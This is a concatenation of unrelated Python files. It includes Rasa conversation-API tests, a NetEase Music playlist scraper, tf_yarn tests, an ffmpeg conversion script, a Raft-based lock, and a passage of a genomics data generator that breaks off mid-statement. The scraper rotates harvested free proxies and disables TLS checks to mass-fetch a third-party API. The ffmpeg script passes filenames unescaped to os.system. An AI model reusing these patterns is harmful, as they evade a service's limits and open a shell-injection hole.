- action: utter_goodbye""",
),
# the default for `all_sessions` is `false` - this test checks that
# only the latest session is returned in that case
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
None,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# `until` parameter means only the first session is returned
(
[
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=1),
SessionStarted(timestamp=2),
UserUttered("hi", {"name": "greet"}, timestamp=3),
ActionExecuted("utter_greet", timestamp=4),
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=5),
SessionStarted(timestamp=6),
UserUttered("bye bye", {"name": "goodbye"}, timestamp=7),
ActionExecuted("utter_goodbye", timestamp=8),
],
4,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet""",
),
# empty conversation
([], None, True, 'version: "2.0"'),
# Conversation with slot
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
SlotSet(REQUESTED_SLOT, "some value"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet
- slot_was_set:
- requested_slot: some value""",
),
],
)
async def test_get_story(
rasa_app: SanicASGITestClient,
monkeypatch: MonkeyPatch,
conversation_events: List[Event],
until_time: Optional[float],
fetch_all_sessions: Optional[bool],
expected: Text,
):
conversation_id = "some-conversation-ID"
tracker_store = InMemoryTrackerStore(Domain.empty())
tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
tracker_store.save(tracker)
monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
url = f"/conversations/{conversation_id}/story?"
query = {}
if fetch_all_sessions is not None:
query["all_sessions"] = fetch_all_sessions
if until_time is not None:
query["until"] = until_time
_, response = await rasa_app.get(url + urllib.parse.urlencode(query))
assert response.status == HTTPStatus.OK
assert response.content.decode().strip() == expected
async def test_get_story_without_conversation_id(
rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
conversation_id = "some-conversation-ID"
url = f"/conversations/{conversation_id}/story"
_, response = await rasa_app.get(url)
assert response.status == HTTPStatus.NOT_FOUND
assert response.json()["message"] == "Conversation ID not found."
async def test_get_story_does_not_update_conversation_session(
rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
conversation_id = "some-conversation-ID"
# domain with short session expiration time of one second
domain = Domain.empty()
domain.session_config = SessionConfig(
session_expiration_time=1 / 60, carry_over_slots=True
)
monkeypatch.setattr(rasa_app.app.agent, "domain", domain)
# conversation contains one session that has expired
now = time.time()
conversation_events = [
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=now - 10),
SessionStarted(timestamp=now - 9),
UserUttered("hi", {"name": "greet"}, timestamp=now - 8),
ActionExecuted("utter_greet", timestamp=now - 7),
]
tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
# the conversation session has expired
assert rasa_app.app.agent.create_processor()._has_session_expired(tracker)
tracker_store = InMemoryTrackerStore(domain)
tracker_store.save(tracker)
monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
_, response = await rasa_app.get(f"/conversations/{conversation_id}/story")
assert response.status == HTTPStatus.OK
# expected story is returned
assert (
response.content.decode().strip()
== """version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet"""
)
# the tracker has the same number of events as were initially added
assert len(tracker.events) == len(conversation_events)
# the last event is still the same as before
assert tracker.events[-1].timestamp == conversation_events[-1].timestamp
@pytest.mark.parametrize(
"initial_tracker_events,events_to_append,expected_events",
[
(
# the tracker is initially empty, and no events are appended
# so we'll just expect the session start sequence with an `action_listen`
[],
[],
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
],
),
(
# the tracker is initially empty, and a user utterance is appended
# we expect a tracker with a session start sequence and a user utterance
[],
[UserUttered("/greet", {"name": "greet", "confidence": 1.0})],
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
],
),
(
# the tracker is initially empty, and a session start sequence is appended
# we'll just expect the session start sequence
[],
[ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
[ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
),
(
# the tracker already contains some events - we can simply append events
[
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
],
[ActionExecuted("utter_greet")],
[
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
ActionExecuted("utter_greet"),
],
),
],
)
async def test_update_conversation_with_events(
rasa_app: SanicASGITestClient,
monkeypatch: MonkeyPatch,
initial_tracker_events: List[Event],
events_to_append: List[Event],
expected_events: List[Event],
):
conversation_id = "some-conversation-ID"
domain = Domain.empty()
tracker_store = InMemoryTrackerStore(domain)
monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
if initial_tracker_events:
tracker = DialogueStateTracker.from_events(
conversation_id, initial_tracker_events
)
tracker_store.save(tracker)
fetched_tracker = await rasa.server.update_conversation_with_events(
conversation_id, rasa_app.app.agent.create_processor(), domain, events_to_append
)
assert list(fetched_tracker.events) == expected_events
|
netease_music_base.py | # -*- coding: utf-8 -*-
# @Author: gunjianpan
# @Date: 2018-10-12 20:00:17
# @Last Modified by: gunjianpan
# @Last Modified time: 2018-10-21 00:16:26
# coding:utf-8
import codecs
import requests
from bs4 import BeautifulSoup
import sqlite3
import threading
import json
import urllib.parse
import time
import random
class Get_list_id():
def __init__(self):
self.urlslist = ["全部", "华语", "欧美", "日语", "韩语", "粤语", "小语种", "流行", "摇滚", "民谣", "电子", "舞曲", "说唱", "轻音乐", "爵士", "乡村", "R&B/Soul", "古典", "民族", "英伦", "金属", "朋克", "蓝调", "雷鬼", "世界音乐", "拉丁", "另类/独立", "New Age", "古风", "后摇", "Bossa Nova", "清晨", "夜晚", "学习",
"工作", "午休", "下午茶", "地铁", "驾车", "运动", "旅行", "散步", "酒吧", "怀旧", "清新", "浪漫", "性感", "伤感", "治愈", "放松", "孤独", "感动", "兴奋", "快乐", "安静", "思念", "影视原声", "ACG", "儿童", "校园", "游戏", "70后", "80后", "90后", "网络歌曲", "KTV", "经典", "翻唱", "吉他", "钢琴", "器乐", "榜单", "00后"]
self.proxieslist = []
self.headers = {
'Host': "music.163.com",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "keep-alive",
'Referer': "http://music.163.com/",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3578.0 Safari/537.36"}
self.time = 0
def run_list(self):
start = time.time()
threadings = []
for id in self.urlslist:
work = threading.Thread(target=self.get_lists, args=(id,))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
end = time.time()
print(end - start)
def get_lists(self, id):
if "/" in id or "&" in id:
f = codecs.open(id.split("/" or "&")
[0] + '.txt', 'a', encoding='utf-8')
else:
f = codecs.open(id + '.txt', 'a', encoding='utf-8')
count = 0
while True:
url = "http://music.163.com/discover/playlist/?order=hot&cat=" + \
urllib.parse.quote_plus(id) + "&limit=35&offset=" + str(count)
html = requests.get(url, headers=self.headers, verify=False).text
try:
table = BeautifulSoup(html, 'html.parser').find(
'ul', id='m-pl-container').find_all('li')
except:
break
ids = []
for item in table:
ids.append(item.find('div', attrs={'class': 'bottom'}).find(
'a').get('data-res-id'))
count += 35
f.write(str(ids) + '\n')
def get_detail_list(self, list_id, file_d, category):
url = 'http://music.163.com/api/playlist/detail?id=' + str(list_id)
proxies = {'http': self.proxieslist[random.randint(
0, len(self.proxieslist) - 1)]}
try:
data = requests.get(url, headers=self.headers,
proxies=proxies, timeout=5).json()
except Exception as requestsError:
print(category + " Error " + list_id + proxies['http'])
return []
if data['code'] != 200:
print(category + " Error " + list_id + proxies['http'])
return []
result = data['result']
musiclist = ""
tracks = result['tracks']
if len(tracks) == 1:
print(category + " Error " + list_id + proxies['http'])
for track in tracks:
musiclist += (track['name'] + '\n')
file_d.write(musiclist)
self.time += 1
if self.time % 100 == 0:
print(self.time)
def get_detail(self, category):
iplist = []
ipfile = codecs.open('ip', 'r', encoding='utf-8')
for index in ipfile.readlines():
iplist.append(index[0:-1])
print(iplist)
self.proxieslist = iplist
threadings = []
if "/" in category or "&" in category:
f = codecs.open(category.split("/" or "&")
[0] + ".txt", 'r', encoding='utf-8')
else:
f = codecs.open(category + ".txt", 'r', encoding='utf-8')
if "/" in category or "&" in category:
file_d = codecs.open(category.split(
"/" or "&")[0] + "data.txt", 'a', encoding='utf-8')
else:
file_d = codecs.open(category + "data.txt", 'a', encoding='utf-8')
for line in f.readlines():
for id in eval(line.replace('\n', '')):
work = threading.Thread(
target=self.get_detail_list, args=(id, file_d, category))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
def run_detail(self):
self.time = 0
start = time.time()
threadings = []
for category in self.urlslist:
self.get_detail(category)
end = time.time()
print(end - start)
print(self.time)
def ip_spider(self, numpage):
file_d = codecs.open("ip", 'a', encoding='utf-8')
headers = {"User-Agent": "IP"}
for index in range(1, numpage + 1):
url = 'http://www.xicidaili.com/nn/' + str(index)
html = requests.get(url, headers=headers, verify=False).text
bs = BeautifulSoup(html, 'html.parser')
tem = bs.find_all('tr')
for index in range(1, len(tem)):
tds = tem[index].find_all('td')
if tds[5].text.lower() == 'http':
temp = tds[5].text.lower() + '://' + tds[1].text + \
':' + tds[2].text
test_url = 'http://music.163.com/api/playlist/detail?id=432853362'
proxies = {'http': temp}
print(temp)
try:
data = requests.get(
test_url, headers=self.headers, proxies=proxies, timeout=2).json()
result = data['result']
tracks = result['tracks']
print(len(tracks))
if len(tracks) != 1:
file_d.write(proxies['http'] + '\n')
except Exception as e:
pass
# table = BeautifulSoup(r.text, 'html.parser').find('ul', class_='f-hide')
# def get_id(list_id):
# url = 'http://music.163.com/api/playlist/detail?id=' + str(list_id)
# proxies = {
# 'http': 'http://118.190.95.35:9001',
# 'https': 'http://180.213.193.137:8123'
# }
# headers = {
# 'Host': "music.163.com",
# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
# "Accept-Encoding": "gzip, deflate, br",
# "Accept-Language": "zh-CN,zh;q=0.9",
# "Connection": "keep-alive",
# 'Referer': "http://music.163.com/",
# "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.0 Safari/537.36"}
# data = requests.get(url, headers=headers, proxies=proxies).json()
# if data['code'] != 200:
# return []
# result = data['result']
# musiclist = ''
# tracks = result['tracks']
# for track in tracks:
# musiclist += (track['name'] + '\n')
# print(musiclist)
# def test():
# url = 'http://wyydsb.xin'
# proxies = {
# 'http': 'http://118.190.95.35:9001',
# 'https': 'https://125.70.13.77:8080'
# }
# headers = {
# 'Host': "music.163.com",
# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
# "Accept-Encoding": "gzip, deflate, br",
# "Accept-Language": "zh-CN,zh;q=0.9",
# "Connection": "keep-alive",
# "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.0 Safari/537.36"}
# data = requests.get(url, headers=headers,
# proxies=proxies, timeout=30).text
# print(data)
|
test__internal.py | import errno
import os
import socket
import subprocess
import sys
import tempfile
import zipfile
from subprocess import check_output
from zipfile import ZipFile, is_zipfile
import pytest
from tf_yarn._internal import (
MonitoredThread,
reserve_sock_addr,
dump_fn,
load_fn,
xset_environ,
zip_path,
StaticDefaultDict,
create_and_pack_conda_env,
)
def test_monitored_thread():
def fail():
raise RuntimeError(42)
thread = MonitoredThread(target=fail)
thread.start()
thread.join()
assert isinstance(thread.exception, RuntimeError)
assert thread.exception.args == (42, )
def test_reserve_sock_addr():
with reserve_sock_addr() as (host, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with pytest.raises(OSError) as exc_info:
sock.bind((host, port))
# Ensure that the iterator holds the sockets open.
assert exc_info.value.errno == errno.EADDRINUSE
def test_xset_environ(monkeypatch):
monkeypatch.setattr(os, "environ", {})
xset_environ(foo="boo")
assert os.environ["foo"] == "boo"
def test_xset_environ_failure(monkeypatch):
monkeypatch.setattr(os, "environ", {"foo": "bar"})
with pytest.raises(RuntimeError):
xset_environ(foo="boo")
assert os.environ["foo"] == "bar"
def test_encode_fn_decode_fn(tmpdir):
def g(x):
return x
def f():
return g(42)
path = tmpdir.join("f.dill")
dump_fn(f, path)
assert load_fn(path)() == f()
def test_zip_path(tmpdir):
s = "Hello, world!"
tmpdir.mkdir("foo").join("bar.txt").write_text(s, encoding="utf-8")
b = 0xffff.to_bytes(4, "little")
tmpdir.join("boo.bin").write_binary(b)
with tempfile.TemporaryDirectory() as tempdirpath:
zipped_path = zip_path(str(tmpdir), tempdirpath)
assert os.path.isfile(zipped_path)
assert zipped_path.endswith(".zip")
assert is_zipfile(zipped_path)
with ZipFile(zipped_path) as zf:
zipped = {zi.filename for zi in zf.filelist}
assert "foo/" in zipped
assert "foo/bar.txt" in zipped
assert "boo.bin" in zipped
assert zf.read("foo/bar.txt") == s.encode()
assert zf.read("boo.bin") == b
def test_static_default_dict():
d = StaticDefaultDict({"foo": 42}, default=100500)
assert d["foo"] == 42
assert d["bar"] == 100500
assert "bar" not in d
def conda_is_available():
p = subprocess.run(
["conda"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
return p.returncode == 0
@pytest.mark.skipif(not conda_is_available(), reason="conda is not available")
def test_create_conda_env(tmpdir):
env_zip_path = create_and_pack_conda_env(
name="test",
python="{0.major}.{0.minor}".format(sys.version_info),
pip_packages=["pycodestyle"],
root=str(tmpdir))
assert os.path.isfile(env_zip_path)
env_path, _zip = os.path.splitext(env_zip_path)
assert os.path.isdir(env_path)
env_unzipped_path = tmpdir.join("unzipped")
with zipfile.ZipFile(env_zip_path) as zf:
zf.extractall(env_unzipped_path)
env_python_bin = os.path.join(env_unzipped_path, "bin", "python")
os.chmod(env_python_bin, 0o755)
check_output([env_python_bin, "-m", "pycodestyle", "--version"])
|
mp4AuotMp3.py | #!/usr/local/python3
#使用ffmpeg,多线程将mp4抽取为mp3
#this is change mp3 from mp4 with ffmpeg
import os
import glob
import threading
import time
#fileList = os.listdir("./")
#print(len(fileList))
#print(fileList)
#for i in fileList:
# if not os.path.isfile(i):
# fileList.remove(i)
#print(len(fileList))
#print(fileList)
mp4List = glob.glob("*.mp4")
def change(mp4file):
newMp4File = mp4file.replace(":","-") #将原始文件中的中文符号替换为-
mp3file = "./mp3/"+newMp4File.split(".")[0]+".mp3"
cmd = "ffmpeg -i "+ mp4file + " -f mp3 -vn " + mp3file
print(cmd)
if not os.path.exists("mp3"):
os.mkdir("mp3")
print(threading.current_thread())
os.system(cmd)
def show(n):
time.sleep(2)
print("value:"+n)
print(threading.current_thread())
for mp4File in mp4List:
#change(mp4File)
t = threading.Thread(target=change,args=(mp4File,))
t.start()
#print(len(mp4List))
#print(mp4List)
|
lock.py | from __future__ import print_function
import threading
import time
import weakref
from pysyncobj import SyncObj, replicated
class LockImpl(SyncObj):
def __init__(self, selfAddress, partnerAddrs, autoUnlockTime, conf):
super(LockImpl, self).__init__(selfAddress, partnerAddrs, conf=conf)
self.__selfClientID = selfAddress
self.__locks = {}
self.__autoUnlockTime = autoUnlockTime
self.__verbose = True
@replicated
def acquire(self, lockPath, clientID, currentTime):
if self.__verbose:
print(f"{threading.get_ident()} acquire: {lockPath}, {clientID}, {currentTime}")
existingLock = self.__locks.get(lockPath, None)
# Auto-unlock old lock
if existingLock is not None:
if currentTime - existingLock[1] > self.__autoUnlockTime:
existingLock = None
# Acquire lock if possible
if existingLock is None or existingLock[0] == clientID:
self.__locks[lockPath] = (clientID, currentTime)
return True
# Lock already acquired by someone else
return False
@replicated
def ping(self, clientID, currentTime):
# if self.__verbose:
# print(f"ping: {clientID}, {currentTime}, {self.__locks}")
for lockPath in list(self.__locks.keys()):
lockClientID, lockTime = self.__locks[lockPath]
if currentTime - lockTime > self.__autoUnlockTime:
del self.__locks[lockPath]
continue
if lockClientID == clientID:
self.__locks[lockPath] = (clientID, currentTime)
@replicated
def release(self, lockPath, clientID):
if self.__verbose:
print(f"{threading.get_ident()} release: {lockPath} {clientID}")
existingLock = self.__locks.get(lockPath, None)
if existingLock is not None and existingLock[0] == clientID:
del self.__locks[lockPath]
@replicated
def toggle_verbose(self):
self.__verbose = not self.__verbose
print(f"{threading.get_ident()} verbose: {self.__verbose}")
def isOwned(self, lockPath, clientID, currentTime):
existingLock = self.__locks.get(lockPath, None)
# if self.__verbose:
# print(existingLock, clientID)
if existingLock is not None:
if existingLock[0] == clientID:
if currentTime - existingLock[1] < self.__autoUnlockTime:
return True
return False
def isAcquired(self, lockPath, clientID, currentTime):
existingLock = self.__locks.get(lockPath, None)
# if self.__verbose:
# print(existingLock, clientID)
if existingLock is not None:
if currentTime - existingLock[1] < self.__autoUnlockTime:
return True
return False
class Lock(object):
def __init__(self, selfAddress, partnerAddrs, autoUnlockTime, conf=None):
self.__lockImpl = LockImpl(selfAddress, partnerAddrs, autoUnlockTime, conf=conf)
self.__selfID = selfAddress
self.__autoUnlockTime = autoUnlockTime
self.__mainThread = threading.current_thread()
self.__initialised = threading.Event()
self.__thread = threading.Thread(target=Lock._autoAcquireThread, args=(weakref.proxy(self),))
self.__thread.start()
while not self.__initialised.is_set():
pass
def _autoAcquireThread(self):
print(f"{threading.get_ident()} _autoAcquireThread")
self.__initialised.set()
try:
while True:
if not self.__mainThread.is_alive():
break
time.sleep(float(self.__autoUnlockTime) / 4.0)
if self.__lockImpl._getLeader() is not None:
self.__lockImpl.ping(self.__selfID, time.time())
except ReferenceError:
pass
def tryAcquireLock(self, path):
self.__lockImpl.acquire(path, self.__selfID, time.time())
def isAcquired(self, path):
return self.__lockImpl.isAcquired(path, self.__selfID, time.time())
def isOwned(self, path):
return self.__lockImpl.isOwned(path, self.__selfID, time.time())
def release(self, path):
self.__lockImpl.release(path, self.__selfID)
def getStatus(self):
return self.__lockImpl.getStatus()
def toggle_verbose(self):
self.__lockImpl.toggle_verbose()
def onTick(self):
self.__lockImpl._onTick(timeToWait=0)
|
generators.py | """
This module contains classes for all the sequence data generators
Classes
MSequenceGenerator - The main base class for all generators.
Multi task batch data generation for training deep neural networks
on high-throughput sequencing data of various geonmics assays
MBPNetSequenceGenerator - Derives from MSequenceGenerator.
Multi task batch data generation for training BPNet on
high-throughput sequencing data of various geonmics assays
IGNORE_FOR_SPHINX_DOCS:
License
MIT License
Copyright (c) 2020 Kundaje Lab
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or
sell copiesof the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
IGNORE_FOR_SPHINX_DOCS:
"""
import json
import logging
import multiprocessing as mp
import numpy as np
import os
import pandas as pd
import pyBigWig
import pyfaidx
import random
import re
from mseqgen import sequtils
from mseqgen.exceptionhandler import NoTracebackException
from mseqgen import utils
from queue import Queue
from threading import Thread
class MSequenceGenerator:
""" Multi task batch data generation for training deep neural
networks on high-throughput sequencing data of various
geonmics assays
Args:
input_config (dict): python dictionary with information
about the input data. Contains the following keys -
*data (str)*
path to the json file containing task information.
See README for more information on the format of
the json file
*stranded (boolean)*
True if data is stranded
*has_control (boolean)*
True if control data has been included
batch_gen_params (dictionary): python dictionary with batch
generation parameters. Contains the following keys -
*input_seq_len (int)*
length of input DNA sequence
*output_len (int)*
length of output profile
*max_jitter (int)*
maximum value for randomized jitter to offset the
peaks from the exact center of the input
*rev_comp_aug (boolean)*
enable reverse complement augmentation
*negative_sampling_rate (float)*
the fraction of batch_size that determines how many
negative samples are added to each batch
*sampling_mode (str)*
the mode of sampling chromosome positions - one of
['peaks', 'sequential', 'random', 'manual']. In
'peaks' mode the data samples are fetched from the
peaks bed file specified in the json file
input_config['data']. In 'manual' mode, the two
column pandas dataframe containing the chromosome
position information is passed to the 'samples'
argument of the class
*shuffle (boolean)*
specify whether input data is shuffled at the
begininning of each epoch
*mode (str)*
'train', 'val' or 'test'
*num_positions" (int)*
specify how many chromosome positions to sample if
sampling_mode is 'sequential' or 'random'. Can be
omitted if sampling_mode is "peaks", has no effect if
present.
*step_size (int)*
specify step size for sampling chromosome positions if
sampling_mode is "sequential". Can be omitted if
sampling_mode is "peaks" or "random", has no effect if
present.
reference_genome (str): the path to the reference genome
fasta file
chrom_sizes (str): path to the chromosome sizes file
chroms (str): the list of chromosomes that will be sampled
for batch generation
num_threads (int): number of parallel threads for batch
generation, default = 10
epochs (int): number of iterations for looping over input
data, default = 1
batch_size (int): size of each generated batch of data,
default = 64
samples (pandas.Dataframe): two column pandas dataframe
with chromosome position information. Required column
names are column 1:'chrom', column 2:'pos'. Use this
parameter if you set batch_gen_params['sampling_mode']
to 'manual'. default = None
**Members**
IGNORE_FOR_SPHINX_DOCS:
_stranded (boolean): True if input data is stranded
_has_control (boolean): True if input data includes
bias/control track
_sampling_mode (str): the mode of sampling chromosome
positions; one of
['peaks', 'sequential', 'random', 'manual'].
_mode (str): 'train', 'val' or 'test'
_tasks (collections.OrderedDict): dictionary of input tasks
taken from input_data json
_num_tasks (int): the number of tasks in 'tasks'
_reference (str): the path to the reference genome fasta
file
_chroms (list): the list of chromosomes that will be sampled
for batch generation
_chrom_sizes_df (pandas.Dataframe): dataframe of the
chromosomes and their corresponding sizes
_num_threads (int): number of parallel threads for batch
generation
_epochs (int): number of iterations for looping over input
data
_batch_size (int): size of each generated batch of data
_input_flank (int): one half of input sequence length
_output_flank (int): one half of output sequence length
_max_jitter (int): the maximum absolute value of jitter to
vary the position of the peak summit to left or right
of the exact center of the input sequence. Range is
-max_jitter to +max_jitter.
_negative_sampling_rate (float): Use a positive value > 0.0
to specify how many negative samples will be added to
each batch. num_negative_samples =
negative_sampling_rate * batch_size. Ignored if
--sampling_mode is not 'peaks', and --mode is not
'train'
_rev_comp_aug (boolean): specify whether reverse complement
augmentation should be applied to each batch of data.
If True, the size of the generated batch is doubled
(i.e batch_size*2 or if negative samples are added then
(batch_size + num_negative_samples)*2). Ignored if
--mode is not 'train'
_shuffle (boolean): if True input data will be shuffled at
the begininning of each epoch
_ready_for_next_epoch (boolean): flag to control batch
generation for the next epoch. The consumer of the
generator is required to send this signal using
'set_ready_for_next_epoch'. This protocol is required
so that excessive and unnecessary batches are not
generated if they will not be consumed
_stop (boolean): flag to indicate that batch generation
should be terminated after the current epoch
_samples (pandas.Dataframe): two column pandas dataframe with
chromosome positions that will be used for generating
batches of data
IGNORE_FOR_SPHINX_DOCS
"""
def __init__(self, input_config, batch_gen_params, reference_genome,
chrom_sizes, chroms, num_threads=10, epochs=1, batch_size=64,
samples=None):
#: True if data is stranded
self._stranded = input_config['stranded']
#: True if data has controls
self._has_control = input_config['has_control']
#: ML task mode 'train', 'val' or 'test'
self._mode = batch_gen_params['mode']
#: sampling mode to get chromosome positions
self._sampling_mode = batch_gen_params['sampling_mode']
# make sure the input_data json file exists
if not os.path.isfile(input_config['data']):
raise NoTracebackException(
"File not found: {} OR you may have accidentally "
"specified a directory path.".format(input_config['data']))
# load the json file
with open(input_config['data'], 'r') as inp_json:
try:
#: dictionary of tasks for training
self._tasks = json.loads(inp_json.read())
except json.decoder.JSONDecodeError:
raise NoTracebackException(
"Unable to load json file {}. Valid json expected. "
"Check the file for syntax errors.".format(
input_config['data']))
# check if the reference genome file exists
if not os.path.isfile(reference_genome):
raise NoTracebackException(
"File not found: {} OR you may have accidentally "
"specified a directory path.", reference_genome)
# check if the chrom_sizes file exists
if not os.path.isfile(chrom_sizes):
raise NoTracebackException(
"File not found: {} OR you may have accidentally "
"specified a directory path.".format(chrom_sizes))
#: the number of tasks in _tasks
self._num_tasks = len(list(self._tasks.keys()))
#: path to the reference genome
self._reference = reference_genome
#: dataframe of the chromosomes and their corresponding sizes
self._chrom_sizes_df = pd.read_csv(
chrom_sizes, sep='\t', header=None, names=['chrom', 'size'])
#: list of chromosomes that will be sampled for batch generation
self._chroms = chroms
# keep only those _chrom_sizes_df rows corresponding to the
# required chromosomes in _chroms
self._chrom_sizes_df = self._chrom_sizes_df[
self._chrom_sizes_df['chrom'].isin(self._chroms)]
# generate a new column for sampling weights of the chromosomes
self._chrom_sizes_df['weights'] = \
(self._chrom_sizes_df['size'] / self._chrom_sizes_df['size'].sum())
#: number of parallel threads for batch generation
self._num_threads = num_threads
#: number of iterations for looping over input data
self._epochs = epochs
#: size of each generated batch of data
self._batch_size = batch_size
# rest of batch generation parameters
#: int:one half of input sequence length
self._input_flank = batch_gen_params['input_seq_len'] // 2
#: one half of input sequence length
self._output_flank = batch_gen_params['output_len'] // 2
#: the maximum absolute value of jitter to vary the position
#: of the peak summit to left or right of the exact center
#: of the input sequence. Range is -max_jitter to +max_jitter.
self._max_jitter = batch_gen_params['max_jitter']
#: Use a positive value > 0.0 to specify how many negative
#: samples will be added to each batch. num_negative_samples =
#: negative_sampling_rate * batch_size. Ignored if
#: --sampling_mode is not 'peaks', and --mode is not 'train'
self._negative_sampling_rate = \
batch_gen_params['negative_sampling_rate']
#: if True, reverse complement augmentation will be applied to
#: each batch of data. The size of the generated batch is
#: doubled (i.e batch_size*2 or if negative samples are added
#: then (batch_size + num_negative_samples)*2). Ignored if
#: --mode is not 'train'
self._rev_comp_aug = batch_gen_params['rev_comp_aug']
#: if True, shuffle the data before the beginning of the epoch
self._shuffle = batch_gen_params['shuffle']
if self._sampling_mode == 'peaks':
# get a pandas dataframe for the peak positions
# Note - we need the 'tasks' dictionary so we can access
# the peaks.bed files from the paths available in the
# dictionary
self._samples = sequtils.getPeakPositions(
self._tasks, self._chroms,
self._chrom_sizes_df[['chrom', 'size']], self._input_flank,
drop_duplicates=True)
elif self._sampling_mode == 'sequential':
if 'num_positions' not in batch_gen_params:
raise NoTracebackException(
"Key not found in batch_gen_params_json: 'num_positions'. "
"Required for sequential sampling mode")
if 'step_size' not in batch_gen_params:
raise NoTracebackException(
"Key not found in batch_gen_params_json: 'step_size'. "
"Required for sequential sampling mode")
# get a pandas dataframe with sequential positions at
# regular intervals
self._samples = sequtils.getChromPositions(
self._chroms, self._chrom_sizes_df[['chrom', 'size']],
self._input_flank, mode=self._sampling_mode,
num_positions=batch_gen_params['num_positions'],
step=batch_gen_params['step_size'])
# since the positions are fixed and equally spaced we
# wont jitter
self._max_jitter = 0
elif self._sampling_mode == 'random':
if 'num_positions' not in batch_gen_params:
raise NoTracebackException(
"Key not found in batch_gen_params_json: 'num_positions'. "
"Required for random sampling mode")
# get a pandas dataframe with random positions
self._samples = sequtils.getChromPositions(
self._chroms, self._chrom_sizes_df[['chrom', 'size']],
self._input_flank, mode=self._sampling_mode,
num_positions=batch_gen_params['num_positions'])
# its already random, why jitter?!
self._max_jitter = 0
elif self._sampling_mode == 'manual':
# check if the samples parameter has been provided
if samples is None:
raise NoTracebackException(
"If sampling_mode is 'manual', 'samples' parameter"
"has to be set. Found None.")
if not isinstance(samples, pandas.Dataframe) or \
set(samples.columns.tolist()) != set(['chrom', 'pos']):
raise NoTracebackException(
"samples' parameter should be a valid pandas.Dataframe"
"with two columns 'chrom' and 'pos'")
#: two column pandas dataframe with chromosome positions,
#: columns = ['chrom', 'pos']
self._samples = samples
#: size of the input samples before padding
self._unpadded_samples_size = len(self._samples)
# pad self._samples dataframe with randomly selected rows
# so that the length of the dataframe is an exact multiple of
# num_threads * batch_size. We do this so we can equally divide
# the batches across several batch generation threads
exact_multiple = sequtils.round_to_multiple(
len(self._samples), num_threads * batch_size, smallest=True)
pad_size = exact_multiple - len(self._samples)
if pad_size > 0:
# If the pad_size > #self._samples, then number of data
# samples for the set (train or val) is significantly less
# than num_threads * batch_size, so we'll have to sample
# the padded rows with replacement
replace = False
if pad_size > len(self._samples):
replace = True
logging.info("mode '{}': Sampling with replacement for "
"data padding")
self._samples = self._samples.append(
self._samples.sample(pad_size, replace=replace),
ignore_index=True)
#: size of the input samples after padding
self._samples_size = len(self._samples)
logging.info("mode '{}': Data size (with {} padded rows) - {}".format(
